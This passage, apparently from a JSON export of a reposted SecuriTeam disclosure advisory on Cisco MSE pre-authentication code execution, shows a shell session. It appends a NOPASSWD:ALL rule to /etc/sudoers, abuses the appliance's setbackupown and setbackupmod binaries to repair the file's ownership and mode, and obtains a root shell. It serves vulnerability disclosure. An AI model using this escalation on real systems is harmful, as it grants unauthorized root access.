class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ls<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">al<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-17\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">oracle <\/span><span class=\"crayon-i\">root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4789<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">27<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-19\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">echo<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;oracle ALL=(ALL) NOPASSWD:ALL&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-21\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sudo <\/span><span class=\"crayon-e\">bash<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-23\"><span class=\"crayon-v\">sudo<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">sudoers <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">mode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0644<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">should <\/span><span class=\"crayon-i\">be<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0440<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-25\"><span class=\"crayon-v\">sudo<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">no <\/span><span class=\"crayon-e\">valid <\/span><span class=\"crayon-e\">sudoers <\/span><span class=\"crayon-e\">sources <\/span><span class=\"crayon-v\">found<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">quitting<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-27\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">setbackupown <\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-29\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">opt<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mse<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">framework<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">setbackupmod<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">440<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">etc<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sudoers<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-31\"><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sudo <\/span><span class=\"crayon-e\">bash<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-33\"><span class=\"crayon-v\">bash<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">3.2<\/span><span class=\"crayon-p\"># id<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-35\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">groups<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">daemon<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">adm<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">disk<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">wheel<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ecdb379d857452597-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ecdb379d857452597-37\"><span class=\"crayon-v\">context<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">user_u<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">system_r<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unconfined_t<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">s0<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0111 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2928\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/01\/createSampledb.sh_-300x191.jpg\"\/><br \/>Vulnerabilities Summary Cisco Mobile Services Engine (MSE) is a platform that helps organizations increase visibility into the network, customize location-based mobile services, and strengthen security. The following advisory describes Cisco MSE Pre-Authentication Code Execution (Cisco MSE version 8.0.100.0). Credit An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program. Vendor &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2928\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Cisco MSE Preauthentication Remote Code Execution<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6280","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6280"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6280\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6280"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}